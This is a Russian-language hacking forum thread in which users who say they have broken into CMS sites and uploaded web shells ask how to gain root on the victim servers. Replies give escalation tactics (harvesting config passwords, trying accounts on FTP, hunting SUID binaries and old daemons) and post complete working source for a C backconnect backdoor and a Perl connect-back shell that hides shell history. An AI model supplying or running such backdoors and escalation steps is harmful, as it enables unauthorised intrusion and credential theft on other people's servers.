Форум АНТИЧАТ - Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)

Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы!

В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что)
И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет(
Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл..
Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.

Посмотри статью Constantine
http://forum.antichat.ru/thread30813.html
Еще в разделе Статьи должно быть что-то по этой тематике.

Obormot
Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт для этой ветки.
Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп.
Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп.
Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии.
В общем, способов существует масса, нужно только проявить фантазию.

Здравствуйте.
У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)

Пробуй биндить как перловыми скриптами так и сишным.

Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик.
Попробуй запустить backconnect вручную с помощью этих скриптов.
Backconnect на С:

Код:

/*

oooo...oooo.oooooooo8.ooooooooooo

.8888o..88.888........88..888..88

.88.888o88..888oooooo.....888....

.88...8888.........888....888....

o88o....88.o88oooo888....o888o...

*********************************

**** Network security team ******

********* nst.void.ru ***********

*********************************

* Title: nsT BackConnect Backdoor v1.0

* Date: 09.04.2006

* Usage:

*        client:        nc -lp 9999

*        server: ./backconnect <ip_client> 9999

*********************************

*/



#include <stdlib.h>

#include <stdio.h>

#include <error.h>

#include <string.h>

#include <fcntl.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <resolv.h>



int main (int argc, char **argv) {

    struct sockaddr_in sock;

    int sd;

    char command[256];

    

    if (argc < 3) {

        printf("%s <host> <port>\n", argv[0]);

        return 1;

    }

    

    close(1);

    

    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {

        perror(argv[0]);

        return 1;

    }

    

    bzero(&sock, sizeof(sock));

    

    sock.sin_family = AF_INET;

    sock.sin_port = htons(atoi(argv[2]));

    inet_aton(argv[1], &sock.sin_addr);

    

    if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {

        perror(argv[0]);

        return 1;

    }

    

    close(2);

    dup(sd);

    

    bzero(command, 256);

    while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {

        system(command);

        bzero(command, 256);

    }

    

    close(sd);

    return 0;

}

Backconnect на Perl:

Код:

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell

#code by:LorD

#We Are :LorD-C0d3r-NT

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host



#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 2121

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system = '/bin/sh';

$ARGC=@ARGV;

print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

if ($ARGC!=2) {

print "Usage: $0 [Host] [Port] \n\n";

die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Resolving HostName\n";

print "[*] Connecting... $ARGV[0] \n";

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);

#EOF

Если есть какие-то вопросы - не стесняйся задавать.

Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?

При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.

hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?

Цитата:

Сообщение от Bac9l

Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в.
И ещё:

Цитата:

BO2K is the most powerful network administration tool available for the Microsoft environment, bar none.

А прокси теперь значит админы не могут для своих целей поднять?
И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)